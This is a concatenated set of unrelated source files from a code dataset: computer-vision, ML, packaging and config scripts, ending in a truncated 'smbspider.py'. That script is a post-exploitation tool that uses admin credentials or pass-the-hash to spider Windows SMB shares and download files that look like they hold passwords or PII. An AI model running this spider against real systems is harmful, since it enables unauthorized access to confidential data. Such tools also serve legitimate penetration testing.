version='BORON') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flags-match']['tcp-flags'] assert tcp_flag == 4 # Nitrogen flows = AclFlowBuilder(acl, environment=0, version='NITROGEN') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flags-match']['tcp-flags'] assert tcp_flag == 4
2.078125
2
Old/OpenCV Scripts/red_filtered_detector.py
multirotorsociety/SAFMC-19-D2-Autonomous-Drone
6
16782
<reponame>multirotorsociety/SAFMC-19-D2-Autonomous-Drone<filename>Old/OpenCV Scripts/red_filtered_detector.py from picamera.array import PiRGBArray from picamera import PiCamera import cv2 import numpy as np import time from fractions import Fraction from PIL import Image #cap = cv2.VideoCapture(0) camera = PiCamera() camera.resolution = (426, 240) camera.framerate = 24 camera.exposure_mode = 'off' camera.exposure_compensation = -3 camera.drc_strength = 'off' camera.still_stats = False camera.awb_mode = 'off' camera.awb_gains = (Fraction(25, 16), Fraction(25,16)) rawCapture = PiRGBArray(camera, size=(426, 240)) # allow the camera to warmup time.sleep(0.1) # lower = [135, 130, 50] # upper = [180, 200, 255] # lower = [160, 100, 100] # upper = [180, 255, 255] # lower2 = [0, 100, 100] # upper2 = [10, 255, 255] #lower1 = [0, 50, 50] #upper1 = [5, 255, 255] out = cv2.VideoWriter(str(time.time()) + ".avi",cv2.VideoWriter_fourcc('M','J','P','G'), 10, (426, 240)) # lower = np.array(lower, dtype = "uint8") # upper = np.array(upper, dtype = "uint8") # lower2 = np.array(lower2, dtype = "uint8") # upper2 = np.array(upper2, dtype = "uint8") #lower1 = np.array(lower1, dtype = "uint8") #upper1 = np.array(upper1, dtype = "uint8") for img in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True): #print(camera.awb_gains) #r, frame = cap.read() for i in range(5): # Clears the 5 frame buffer frame = img.array height, width = frame.shape[:2] centre = (int(width/2), int(height/2)) #frame = cv2.GaussianBlur(frame, (9, 9), 0) #frame = cv2.medianBlur(frame,3) #frame = cv2.GaussianBlur(frame, (9, 9), 0) #mask = cv2.inRange(frame, lower, upper) #mask2 = cv2.inRange(frame, lower2, upper2) #mask2 = cv2.inRange(frame, lower1, upper1) #mask = mask1 + mask2 #img_rec_red = cv2.bitwise_and(frame, frame, mask = mask) #img_rec_redo = cv2.bitwise_and(frame, frame, mask = mask2) #cv2.imshow("pre or1", img_rec_red) #cv2.imshow("pre or2", img_rec_redo) #img_rec_red = cv2.bitwise_or(img_rec_red, img_rec_redo) b_channel = np.array(frame[:,:,0]).astype('float') g_channel = np.array(frame[:,:,1]).astype('float') r_channel = np.array(frame[:,:,2]).astype('float') # #cv2.imshow('b_chan', b_channel) # # cv2.imshow('g_chan', g_channel) # # cv2.imshow('r_chan', r_channel) bgr_channel = np.add((np.add(b_channel, g_channel)), r_channel) img_rec_red2 = np.subtract(r_channel,((b_channel + g_channel)/ 2)) #img_rec_red2 = np.divide(r_channel, 255) img_rec_red2 = np.divide(img_rec_red2,255) #img_rec_red2 = np.square(img_rec_red2) img_rec_red2[img_rec_red2 < 0.3] = 0 img_rec_red2 = img_rec_red2 * 255 img_rec_red2 = np.floor(img_rec_red2).astype('uint8') #img_rec_red = cv2.cvtColor(img_rec_red, cv2.COLOR_BGR2GRAY) #cv2.imshow('recred2', img_rec_red2) ret, th = cv2.threshold(img_rec_red2,10,255,cv2.THRESH_BINARY) #ret, th = cv2.threshold(r_channel.astype('uint8'),110,255,cv2.THRESH_BINARY) #th = cv2.bitwise_not(th, th) kernel = np.ones((5,5),np.uint8) #th = cv2.erode(th, kernel) th = cv2.dilate(th, kernel) th = cv2.GaussianBlur(th, (5,5), 0) try: M = cv2.moments(th) # calculate x,y coordinate of center cX = int(M["m10"] / M["m00"]) cY = int(M["m01"] / M["m00"]) # put text and highlight the center cv2.circle(frame, (cX, cY), 5, (255, 255, 255), -1) #cv2.putText(frame, "centroid", (cX - 25, cY - 25),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2) cv2.line(frame, centre, (cX, cY), (255,0,0), 2) dX = cX - centre[0] dY = centre[1] - cY cv2.putText(frame, ("(" + str(dX) + ", " + str(dY) + " )"), (centre[0] - 20, centre[1] - 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2) print('Velocities: ' + str(dX) + "," + str(dY)) except: print("No centre detected") #kernel2 = np.ones((15,15),np.uint8) #eroded_th = cv2.erode(dilated_th, kernel2) #blurred_th = cv2.GaussianBlur(eroded_th.copy(), (9, 9), 0) #eroded_th = cv2.bitwise_not(eroded_th,eroded_th) #dilated_th = cv2.bitwise_not(dilated_th, dilated_th) # circles = cv2.HoughCircles(th,cv2.HOUGH_GRADIENT, 1,1000, # param1=40,param2=23,minRadius=20,maxRadius=0) # try: # circles = np.uint16(np.around(circles)) # for i in circles[0,:]: # # draw the outer circle # cv2.circle(frame,(i[0],i[1]),i[2],(0,255,0),2) # # draw the center of the circle # cv2.circle(frame,(i[0],i[1]),2,(0,0,255),3) # except: # pass cv2.imshow('original', frame) #cv2.imshow('rec_red',img_rec_red) cv2.imshow('detected circles',th) out.write(frame) k = cv2.waitKey(1) rawCapture.truncate(0) if k == 0xFF & ord("q"): break #cv2.destroyAllWindows() #cap.release() out.release()
2.390625
2
setup.py
Maven85/plugin.video.magenta-sport
0
16783
# -*- coding: utf-8 -*- # Module: default # Author: asciidisco # Created on: 24.07.2017 # License: MIT https://goo.gl/WA1kby """Setup""" from __future__ import unicode_literals from os.path import abspath, dirname, join from re import search from sys import exit, version, version_info from setuptools import find_packages, setup REQUIRED_PYTHON_VERSION = (2, 7) PACKAGES = find_packages() INSTALL_DEPENDENCIES = [] SETUP_DEPENDENCIES = [] TEST_DEPENDENCIES = [ 'nose', 'Kodistubs', 'httpretty', 'mock', ] EXTRA_DEPENDENCIES = { 'dev': [ 'nose', 'flake8', 'codeclimate-test-reporter', 'pylint', 'mccabe', 'pycodestyle', 'pyflakes', 'Kodistubs', 'httpretty', 'mock', 'requests', 'beautifulsoup4', 'pyDes', 'radon', 'Sphinx', 'sphinx_rtd_theme', 'm2r', 'kodi-release-helper', 'dennis', 'blessings', 'demjson', 'restructuredtext_lint', 'yamllint', ] } def get_addon_data(): """Loads the Kodi plugin data from addon.xml""" root_dir = dirname(abspath(__file__)) pathname = join(root_dir, 'addon.xml') with open(pathname, 'rb') as addon_xml: addon_xml_contents = addon_xml.read() _id = search( r'(?<!xml )id="(.+?)"', addon_xml_contents).group(1) author = search( r'(?<!xml )provider-name="(.+?)"', addon_xml_contents).group(1) name = search( r'(?<!xml )name="(.+?)"', addon_xml_contents).group(1) version = search( r'(?<!xml )version="(.+?)"', addon_xml_contents).group(1) desc = search( r'(?<!xml )description lang="en_GB">(.+?)<', addon_xml_contents).group(1) email = search( r'(?<!xml )email>(.+?)<', addon_xml_contents).group(1) source = search( r'(?<!xml )email>(.+?)<', addon_xml_contents).group(1) return { 'id': _id, 'author': author, 'name': name, 'version': version, 'desc': desc, 'email': email, 'source': source, } if version_info < REQUIRED_PYTHON_VERSION: exit('Python >= 2.7 is required. Your version:\n{0}'.format(version)) if __name__ == '__main__': ADDON_DATA = get_addon_data() setup( name=ADDON_DATA.get('name'), version=ADDON_DATA.get('version'), author=ADDON_DATA.get('author'), author_email=ADDON_DATA.get('email'), description=ADDON_DATA.get('desc'), packages=PACKAGES, include_package_data=True, install_requires=INSTALL_DEPENDENCIES, setup_requires=SETUP_DEPENDENCIES, tests_require=TEST_DEPENDENCIES, extras_require=EXTRA_DEPENDENCIES, test_suite='nose.collector', )
1.757813
2
franka_lcas_experiments/script/load_model_rtp.py
arsh09/franka_ros_lcas
2
16784
import numpy as np import os, sys os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.keras.models import Model import tensorflow as tf from PIL import Image from utils_rtp import ProMP class Predictor: def __init__(self, encoder_model_path, predictor_model_path): self.all_phi = self.promp_train() encoder_model = tf.keras.models.load_model(encoder_model_path) self.encoder = Model(encoder_model.input, encoder_model.get_layer("bottleneck").output) self.exp_model = tf.keras.models.load_model(predictor_model_path, compile=False) def promp_train(self): phi = ProMP().basis_func_gauss_glb() zeros = np.zeros([phi.shape[0], 8]) h1 = np.hstack((phi, zeros, zeros, zeros, zeros, zeros, zeros)) h2 = np.hstack((zeros, phi, zeros, zeros, zeros, zeros, zeros)) h3 = np.hstack((zeros, zeros, phi, zeros, zeros, zeros, zeros)) h4 = np.hstack((zeros, zeros, zeros, phi, zeros, zeros, zeros)) h5 = np.hstack((zeros, zeros, zeros, zeros, phi, zeros, zeros)) h6 = np.hstack((zeros, zeros, zeros, zeros, zeros, phi, zeros)) h7 = np.hstack((zeros, zeros, zeros, zeros, zeros, zeros, phi)) vstack = np.vstack((h1, h2, h3, h4, h5, h6, h7)) vstack = tf.cast(vstack, tf.float32) return vstack def preprocess_image(self, image): return np.asarray(image.resize((256, 256))) def predict(self, image_numpy): # image_numpy = np.expand_dims(image_numpy, axis=0) latent_img = self.encoder.predict(image_numpy/255) q_val_pred = self.exp_model.predict(latent_img) traj_pred = np.matmul(self.all_phi, np.transpose(q_val_pred)).squeeze() return traj_pred #np.reshape(traj_pred, (-1, 150)) if __name__ == "__main__": ENCODED_MODEL_PATH = "/home/arshad/Documents/reach_to_palpate_validation_models/encoded_model_regions" PREDICTOR_MODEL = "/home/arshad/Documents/reach_to_palpate_validation_models/model_cnn_rgb_1" image = np.load( "/home/arshad/catkin_ws/image_xy_rtp.npy" ) predictor = Predictor(ENCODED_MODEL_PATH, PREDICTOR_MODEL) traj = predictor.predict(image) np.save("/home/arshad/catkin_ws/predicted_joints_values_rtp.npy", traj) print ("\n Predicted ProMPs weights for RTP task. Joint trajectory is saved in the file. \n Press 'p' to display the trajectory...")
2.078125
2
sdv/tabular/ctgan.py
joanvaquer/SDV
0
16785
<reponame>joanvaquer/SDV """Wrapper around CTGAN model.""" from sdv.tabular.base import BaseTabularModel class CTGAN(BaseTabularModel): """Model wrapping ``CTGANSynthesizer`` model. Args: field_names (list[str]): List of names of the fields that need to be modeled and included in the generated output data. Any additional fields found in the data will be ignored and will not be included in the generated output. If ``None``, all the fields found in the data are used. field_types (dict[str, dict]): Dictinary specifying the data types and subtypes of the fields that will be modeled. Field types and subtypes combinations must be compatible with the SDV Metadata Schema. field_transformers (dict[str, str]): Dictinary specifying which transformers to use for each field. Available transformers are: * ``integer``: Uses a ``NumericalTransformer`` of dtype ``int``. * ``float``: Uses a ``NumericalTransformer`` of dtype ``float``. * ``categorical``: Uses a ``CategoricalTransformer`` without gaussian noise. * ``categorical_fuzzy``: Uses a ``CategoricalTransformer`` adding gaussian noise. * ``one_hot_encoding``: Uses a ``OneHotEncodingTransformer``. * ``label_encoding``: Uses a ``LabelEncodingTransformer``. * ``boolean``: Uses a ``BooleanTransformer``. * ``datetime``: Uses a ``DatetimeTransformer``. anonymize_fields (dict[str, str]): Dict specifying which fields to anonymize and what faker category they belong to. primary_key (str): Name of the field which is the primary key of the table. constraints (list[Constraint, dict]): List of Constraint objects or dicts. table_metadata (dict or metadata.Table): Table metadata instance or dict representation. If given alongside any other metadata-related arguments, an exception will be raised. If not given at all, it will be built using the other arguments or learned from the data. epochs (int): Number of training epochs. Defaults to 300. log_frequency (boolean): Whether to use log frequency of categorical levels in conditional sampling. Defaults to ``True``. embedding_dim (int): Size of the random sample passed to the Generator. Defaults to 128. gen_dim (tuple or list of ints): Size of the output samples for each one of the Residuals. A Resiudal Layer will be created for each one of the values provided. Defaults to (256, 256). dis_dim (tuple or list of ints): Size of the output samples for each one of the Discriminator Layers. A Linear Layer will be created for each one of the values provided. Defaults to (256, 256). l2scale (float): Wheight Decay for the Adam Optimizer. Defaults to 1e-6. batch_size (int): Number of data samples to process in each step. """ _CTGAN_CLASS = None _model = None _DTYPE_TRANSFORMERS = { 'O': 'label_encoding' } def __init__(self, field_names=None, field_types=None, field_transformers=None, anonymize_fields=None, primary_key=None, constraints=None, table_metadata=None, epochs=300, log_frequency=True, embedding_dim=128, gen_dim=(256, 256), dis_dim=(256, 256), l2scale=1e-6, batch_size=500): super().__init__( field_names=field_names, primary_key=primary_key, field_types=field_types, anonymize_fields=anonymize_fields, constraints=constraints, table_metadata=table_metadata ) try: from ctgan import CTGANSynthesizer # Lazy import to make dependency optional self._CTGAN_CLASS = CTGANSynthesizer except ImportError as ie: ie.msg += ( '\n\nIt seems like `ctgan` is not installed.\n' 'Please install it using:\n\n pip install sdv[ctgan]' ) raise self._embedding_dim = embedding_dim self._gen_dim = gen_dim self._dis_dim = dis_dim self._l2scale = l2scale self._batch_size = batch_size self._epochs = epochs self._log_frequency = log_frequency def _fit(self, table_data): """Fit the model to the table. Args: table_data (pandas.DataFrame): Data to be learned. """ self._model = self._CTGAN_CLASS( embedding_dim=self._embedding_dim, gen_dim=self._gen_dim, dis_dim=self._dis_dim, l2scale=self._l2scale, batch_size=self._batch_size, ) categoricals = [ field for field, meta in self._metadata.get_fields().items() if meta['type'] == 'categorical' ] self._model.fit( table_data, epochs=self._epochs, discrete_columns=categoricals, log_frequency=self._log_frequency, ) def _sample(self, num_rows): """Sample the indicated number of rows from the model. Args: num_rows (int): Amount of rows to sample. Returns: pandas.DataFrame: Sampled data. """ return self._model.sample(num_rows)
2.40625
2
cointrader/config.py
3con/cointrader
103
16786
<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os import logging import logging.config if (sys.version_info > (3, 0)): # Python 3 code in this block import configparser else: # Python 2 code in this block import ConfigParser as configparser DEFAULT_CONFIG = ".cointrader.ini" def get_path_to_config(): env = os.getenv("HOME") return os.path.join(env, DEFAULT_CONFIG) class Config(object): def __init__(self, configfile=None): self.verbose = False self.market = "poloniex" self.api_key = None self.api_secret = None if configfile: logging.config.fileConfig(configfile.name) config = configparser.ConfigParser() config.readfp(configfile) exchange = config.get("DEFAULT", "exchange") self.api_key = config.get(exchange, "api_key") self.api_secret = config.get(exchange, "api_secret") @property def api(self): if not self.api_key or not self.api_secret: raise RuntimeError("API not configured") return self.api_key, self.api_secret
2.328125
2
src/snakeoil/descriptors.py
Arusekk/snakeoil
0
16787
"""Classes implementing the descriptor protocol.""" __all__ = ("classproperty",) class classproperty: """Like the builtin :py:func:`property` but takes a single classmethod. Essentially, it allows you to use a property on a class itself- not just on its instances. Used like this: >>> from snakeoil.descriptors import classproperty >>> class foo: ... ... @classproperty ... def test(cls): ... print("invoked") ... return True >>> foo.test invoked True >>> foo().test invoked True """ def __init__(self, getter): self.getter = getter def __get__(self, instance, owner): return self.getter(owner)
3.484375
3
playground/pets_dubins.py
pecey/mbrl-lib
0
16788
<gh_stars>0 import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np import torch import omegaconf import mbrl.env.continuous_dubins as dubins_env import mbrl.env.reward_fns as reward_fns import mbrl.env.termination_fns as termination_fns import mbrl.models as models import mbrl.planning as planning import mbrl.util.common as common_util import mbrl.util as util def train_callback(_model, _total_calls, _epoch, tr_loss, val_score, _best_val): train_losses.append(tr_loss) val_scores.append(val_score.mean().item()) # this returns val score per ensemble model def plot_graph(_axs, _frame, _text, _trial, _steps_trial, _all_rewards, force_update=False): if not force_update and (_steps_trial % 10 != 0): return _axs.clear() _axs.set_xlim([0, num_trials + .1]) _axs.set_ylim([0, 200]) _axs.set_xlabel("Trial") _axs.set_ylabel("Trial reward") _axs.plot(_all_rewards, 'bs-') _text.set_text(f"Trial {_trial + 1}: {_steps_trial} steps") if __name__ == "__main__": mpl.rcParams.update({"font.size": 16}) device = 'cuda:0' if torch.cuda.is_available() else 'cpu' noisy = False seed = 0 env = dubins_env.ContinuousDubinsEnv(noisy) env.seed(seed) rng = np.random.default_rng(seed=seed) generator = torch.Generator(device=device) generator.manual_seed(seed) obs_shape = env.observation_space.shape act_shape = env.action_space.shape # This functions allows the model to evaluate the true rewards given an observation reward_fn = reward_fns.continuous_dubins # This function allows the model to know if an observation should make the episode end term_fn = termination_fns.continuous_dubins trial_length = 200 num_trials = 10 ensemble_size = 5 # Everything with "???" indicates an option with a missing value. # Our utility functions will fill in these details using the # environment information cfg_dict = { # dynamics model configuration "dynamics_model": { "model": { "_target_": "mbrl.models.GaussianMLP", "device": device, "num_layers": 3, "ensemble_size": ensemble_size, "hid_size": 200, "use_silu": True, "in_size": "???", "out_size": "???", "deterministic": False, "propagation_method": "fixed_model" } }, # options for training the dynamics model "algorithm": { "learned_rewards": False, "target_is_delta": True, "normalize": True, }, # these are experiment specific options "overrides": { "trial_length": trial_length, "num_steps": num_trials * trial_length, "model_batch_size": 32, "validation_ratio": 0.05 } } cfg = omegaconf.OmegaConf.create(cfg_dict) # Create a 1-D dynamics model for this environment dynamics_model = common_util.create_one_dim_tr_model(cfg, obs_shape, act_shape) # Create a gym-like environment to encapsulate the model model_env = models.ModelEnv(env, dynamics_model, term_fn, reward_fn, generator=generator) replay_buffer = common_util.create_replay_buffer(cfg, obs_shape, act_shape, rng=rng) common_util.rollout_agent_trajectories( env, trial_length, # initial exploration steps planning.RandomAgent(env), {}, # keyword arguments to pass to agent.act() replay_buffer=replay_buffer, trial_length=trial_length ) print("# samples stored", replay_buffer.num_stored) agent_cfg = omegaconf.OmegaConf.create({ # this class evaluates many trajectories and picks the best one "_target_": "mbrl.planning.TrajectoryOptimizerAgent", "planning_horizon": 15, "replan_freq": 1, "verbose": False, "action_lb": "???", "action_ub": "???", # this is the optimizer to generate and choose a trajectory "optimizer_cfg": { "_target_": "mbrl.planning.CEMOptimizer", "num_iterations": 5, "elite_ratio": 0.1, "population_size": 500, "alpha": 0.1, "device": device, "lower_bound": "???", "upper_bound": "???", "return_mean_elites": True } }) agent = planning.create_trajectory_optim_agent_for_model( model_env, agent_cfg, num_particles=20 ) train_losses = [] val_scores = [] # Create a trainer for the model model_trainer = models.ModelTrainer(dynamics_model, optim_lr=1e-3, weight_decay=5e-5) # Create visualization objects fig, axs = plt.subplots(1, 1, figsize=(14, 3.75)) ax_text = axs.text(300, 50, "") # Main PETS loop all_rewards = [0] for trial in range(num_trials): obs = env.reset() agent.reset() done = False total_reward = 0.0 steps_trial = 0 while not done: # --------------- Model Training ----------------- if steps_trial == 0: dynamics_model.update_normalizer(replay_buffer.get_all()) # update normalizer stats dataset_train, dataset_val = replay_buffer.get_iterators( batch_size=cfg.overrides.model_batch_size, val_ratio=cfg.overrides.validation_ratio, train_ensemble=True, ensemble_size=ensemble_size, shuffle_each_epoch=True, bootstrap_permutes=False, # build bootstrap dataset using sampling with replacement ) model_trainer.train( dataset_train, dataset_val=dataset_val, num_epochs=50, patience=50, callback=train_callback) # --- Doing env step using the agent and adding to model dataset --- next_obs, reward, done, _ = common_util.step_env_and_add_to_buffer(env, obs, agent, {}, replay_buffer) obs = next_obs total_reward += reward steps_trial += 1 if steps_trial == trial_length: break all_rewards.append(total_reward) env.save_trajectory(f"dubins_{trial}.png") print(all_rewards) plot_graph(axs, None, ax_text, trial, steps_trial, all_rewards, force_update=True) # fig.savefig("dubins.png")
2.046875
2
pixiv_spider/__init__.py
Uzukidd/Pixiv-spider
1
16789
<reponame>Uzukidd/Pixiv-spider<gh_stars>1-10 # from pixiv_web_crawler import Getters
1.117188
1
parsers/parsers_base.py
xm4dn355x/async_test
0
16790
# # Общие функции для всех парсеров # # Автор: <NAME> # Лицензия: MIT License # from time import sleep import requests def get_htmls(urls): """ Получает список URL-адресов Возвращает список из всех полученных HTML документов :param urls: Список URL-адресов :type urls: list :return: Возвращаем список HTML-документов """ htmls = [] # Готовим болванку для возвращаемого значения for url in urls: # Прогоняем все URL из списка html = get_html(url) # Получаем HTML по полученному URL из списка htmls.append(html) # Добавляем полученный HTML в возвращаемый список sleep(1) return htmls # Возвращаем список в котором каждый элемент - это HTML документ def get_html(url): """ Получает URL-адрес Возвращает тело HTML документа :param url: URL-адрес :type url: str :return: Возвращаем HTML-документ """ print(f"""get_html url={url}""") r = requests.get(url, headers={'User-Agent': 'Custom'}) # Создаем объект web-страницы по полученному url print(r) # Ответ от сервера <Response [200]> return r.text # Возвращаем тело HTML документа if __name__ == '__main__': pass
3.046875
3
smbspider/smbspider.py
vonahi/pentesting_scripts
13
16791
#!/usr/bin/python # # This post-exploitation script can be used to spider numerous systems # to identify sensitive and/or confidential data. A good scenario to # use this script is when you have admin credentials to tons of # Windows systems, and you want to look for files containing data such # as PII, network password documents, etc. For the most part, # this script uses smbclient, parses the results, and prints # out the results in a nice format for you. # # Author: <NAME> <<EMAIL> # Version: 2.4 # Updated: 01/23/2014 # import commands, time, getopt, re, os from sys import argv start_time = time.time() class colors: red = "\033[1;31m" blue = "\033[1;34m" norm = "\033[0;00m" green = "\033[1;32m" banner = "\n " + "*" * 56 banner += "\n * _ *" banner += "\n * | | // \\\\ *" banner += "\n * ___ _ __ ___ | |__ _\\\\()//_ *" banner += "\n * / __| '_ ` _ \| '_ \ / // \\\\ \ *" banner += "\n * \__ \ | | | | | |_) | |\__/| *" banner += "\n * |___/_| |_| |_|_.__/ *" banner += "\n * *" banner += "\n * SMB Spider v2.4, <NAME> (<EMAIL>) *" banner += "\n " + "*" * 56 + "\n" def help(): print banner print " Usage: %s <OPTIONS>" % argv[0] print colors.red + "\n Target(s) (required): \n" + colors.norm print "\t -h <host>\t Provide IP address or a text file containing IPs." print "\t\t\t Supported formats: IP, smb://ip/share, \\\\ip\\share\\" print colors.red + "\n Credentials (required): \n" + colors.norm print "\t -u <user>\t Specify a valid username to authenticate to the system(s)." print "\t -p <pass>\t Specify the password which goes with the username." print "\t -P <hash>\t Use -P to provide password hash if cleartext password isn't known." print "\t -d <domain>\t If using a domain account, provide domain name." print colors.green + "\n Shares (optional):\n" + colors.norm print "\t -s <share>\t Specify shares (separate by comma) or specify \"profile\" to spider user profiles." print "\t -f <file>\t Specify a list of shares from a file." print colors.green + "\n Other (optional):\n" + colors.norm print "\t -w \t\t Avoid verbose output. Output successful spider results to smbspider_host_share_user.txt." print "\t\t\t This option is HIGHLY recommended if numerous systems are being scanned." print "\t -n \t\t ** Ignore authentication check prior to spidering." print "\t -g <file> \t Grab (download) files that match strings provided in text file. (Case sensitive.)" print "\t\t\t ** Examples: *assword.doc, *assw*.doc, pass*.xls, etc." print colors.norm exit() def start(argv): if len(argv) < 1: help() try: opts, args = getopt.getopt(argv, "u:p:d:h:s:f:P:wng:") except getopt.GetoptError, err: print colors.red + "\n [-] Error: " + str(err) + colors.norm # set default variables to prevent errors later in script sensitive_strings = [] smb_user = "" smb_pass = "" smb_domain = "" smb_host = [] smb_share = ["profile"] pth = False output = False unique_systems = [] ignorecheck = False inputfile = False #parse through arguments for opt, arg in opts: if opt == "-u": smb_user = arg elif opt == "-p": smb_pass = arg elif opt == "-d": smb_domain = arg elif opt == "-h": try: smb_host = open(arg).read().split('\n') inputfile = True except: if "\\\\" in arg and "\\" not in arg[-1:]: test = arg[2:].replace("\\","\\") smb_host.append("\\\\%s\\" % test) else: smb_host.append(arg) elif opt == "-f": smb_share = open(arg).read().split() elif opt == "-s": smb_share = arg.split(',') elif opt == "-P": if arg[-3:] == ":::": arg = arg[:-3] smb_pass = arg pth = True elif opt == "-w": output = True elif opt == "-n": ignorecheck = True elif opt == "-g": sensitive_strings = open(arg).read().split("\n")[:-1] #check options before proceeding if (not smb_user or not smb_pass or not smb_host): print colors.red + "\n [-] " + colors.norm + "Error: Please check to ensure that all required options are provided." help() if pth: result = commands.getoutput("pth-smbclient") if "not found" in result.lower(): print colors.red + "\n [-] " + colors.norm + "Error: The passing-the-hash package was not found. Therefore, you cannot pass hashes." print "Please run \"apt-get install passing-the-hash\" to fix this error and try running the script again.\n" exit() #make smb_domain, smb_user, and smb_pass one variable if smb_domain: credentials = smb_domain + "\\\\" + smb_user + " " + smb_pass else: credentials = smb_user + " " + smb_pass for system in smb_host: if "\\" in system or "//" in system: if "\\" in system: sys = system[system.find("\\")+2:] sys = sys[:sys.find("\\")] else: sys = system[system.find("/")+2:] sys = sys[:sys.find("/")] if sys not in unique_systems: unique_systems.append(sys) else: unique_systems.append(system) #start spidering print banner unique_systems = [i for i in unique_systems if i != ''] #remove blank elements from list print " [*] Spidering %s system(s)..." % len(unique_systems) begin = spider(credentials, smb_host, smb_share, pth, output, ignorecheck, inputfile, sensitive_strings) begin.start_spidering() class spider: def __init__(self, credentials, hosts, shares, pth, output, ignorecheck, inputfile, sensitive_strings): self.list_of_hosts = hosts self.list_of_shares = shares self.credentials = credentials self.smb_host = "" self.smb_share = "" self.skip_host = "" self.pth = pth self.outputfile = output self.blacklisted = [] self.ignorecheck = ignorecheck self.inputfile = inputfile self.smb_download = True self.file_locations = [] self.sensitive_strings = sensitive_strings self.profile = False def start_spidering(self): share = "" self.total_hosts = 0 empty_share_error = colors.red + " [-] " + colors.norm + "Error: Empty share detected for host %s. Skipping share." for test_host in self.list_of_hosts: temp = test_host if ("//" in temp or "\\\\" in temp) and self.list_of_shares[0] != "profile": print colors.red + " [-] " + colors.norm + "Error: You cannot specify a share if your target(s) contains \\\\<ip>\\<share> or //<ip>/<share>\n" exit() for host in self.list_of_hosts: self.total_hosts += 1 tmp_share = host.replace("/","") tmp_share = host.replace("\\","") orig_host = host # ensures that we can check the original host value later on if we need to if "\\\\" in host: # this checks to see if host is in the format of something like \\192.168.0.1\C$ host = host[2:] host = host[:host.find("\\")] elif "smb://" in host: # this checks to see if the host contains a format such as smb://192.168.0.1/C$ host = host[6:] host = host[:host.find("/")] if self.skip_host == host: self.blacklisted.append(host) continue if len(self.list_of_shares) == 1 and ("//" in orig_host or "\\\\" in orig_host): if "//" in orig_host: share = orig_host[orig_host.rfind("/")+1:] elif "\\\\" in orig_host: if orig_host[-1] == "\\": temp = orig_host[:-1] share = temp[temp.rfind("\\")+1:] self.smb_host = host self.smb_share = share else: for share in self.list_of_shares: if self.skip_host == host: self.blacklisted.append(host) break self.smb_host = host self.smb_share = share tmp_share = tmp_share.replace(self.smb_host,"") tmp_share = tmp_share.replace("smb:///","") if len(tmp_share) == 0 and (self.smb_share != "profile" and len(self.smb_share) == 0): print empty_share_error % self.smb_host continue if len(self.list_of_shares) > 1: for x in self.list_of_shares: self.smb_share = x print "\n [*] Attempting to spider smb://%s/%s" % (self.smb_host, self.smb_share.replace("profile","<user profiles>")) self.spider_host() else: print "\n [*] Attempting to spider smb://%s/%s " % (self.smb_host, self.smb_share.replace("profile","<user profiles>")) self.spider_host() if self.list_of_shares[0] == "profile": if self.inputfile: print " [*] Finished with smb://%s/<user profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts-1)) else: print " [*] Finished with smb://%s/<user profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts)) else: print " [*] Finished with smb://%s/%s. [Remaining: %s] " % (self.smb_host, self.smb_share, str(len(self.list_of_hosts)-self.total_hosts)) if self.smb_download: self.start_downloading() def start_downloading(self): if len(self.sensitive_strings) == 0: return print "\n" + colors.blue + " [*] " + colors.norm + "Attempting to download files that were deemed sensitive." if not os.path.exists('smbspider-downloads'): os.makedirs('smbspider-downloads') for f in self.file_locations: host = f[2:] host = str(host[:host.find("\\")]) share = f[len(host)+3:] share = share[:share.find("\\")] full_path = f.replace("\\\\%s\\%s\\" % (host, share), "").strip() file_name = full_path[full_path.rfind("\\")+1:] for s in self.sensitive_strings: if s in file_name: result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \ host,file_name, host, share, self.credentials)) print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share) commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s\"" % (host, file_name, host, file_name)) else: temp_file = s.split("*") all_match = 0 for tmp in temp_file: if tmp in full_path: all_match = 1 else: all_match = 0 break if all_match == 1: result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \ host,file_name, host, share, self.credentials)) print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share) commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s_%s\"" % (host, file_name, host, file_name)) def parse_result(self, result): ############################################################ # this small section removes all of the unnecessary crap. a bit ugly, i know! :x errors = ["O_SUCH_F","ACCESS_DEN", "US_OBJECT_NAME_IN", "US_INVALID_NETWORK_RE", "CT_NAME_NOT", "not present","CONNECTION_REFUSED" ] result = result.split('\n') purge = [] trash = [" . ", " .. ", "Domain=", " D", "blocks of size", "wrapper called", "Substituting user supplied"] for num in range(0,len(result)): for d in trash: if d in result[num] or len(result[num]) < 2: purge.append(num) purge = list(set(purge)) purge = sorted(purge, reverse=True) for i in purge: del result[i] ############################################################ directory = "" filename = "" file_locations = [] file_change = False for x in result: if x[0] == "\\": directory = x file_change = False else: filename = x[2:] filename = filename[:filename.find(" ")] file_change = True fail = 0 if not file_change: continue for error in errors: if error in filename: fail = 1 if fail == 0 and len(filename) > 0: if not self.outputfile: file_complete_path = "\\\\%s\%s" % (self.smb_host,self.smb_share) + directory + "\\" + filename print colors.blue + " [*] " + colors.norm + file_complete_path else: if not os.path.exists('smbspider'): os.makedirs('smbspider') if self.profile: lawl_share = "profile" else: lawl_share = self.smb_share output = open("smbspider/smbspider_%s_%s_%s.txt" % (self.smb_host, lawl_share, self.credentials.split()[0]), 'a') file_complete_path = colors.blue + " [*] " + colors.norm + "\\\\%s\%s" % (self.smb_host,lawl_share) + directory + "\\" + filename + "\n" output.write(file_complete_path) output.close() if self.smb_download: self.file_locations.append(file_complete_path[file_complete_path.find("\\\\"):]) def fingerprint_fs(self): result = commands.getoutput("%s -c 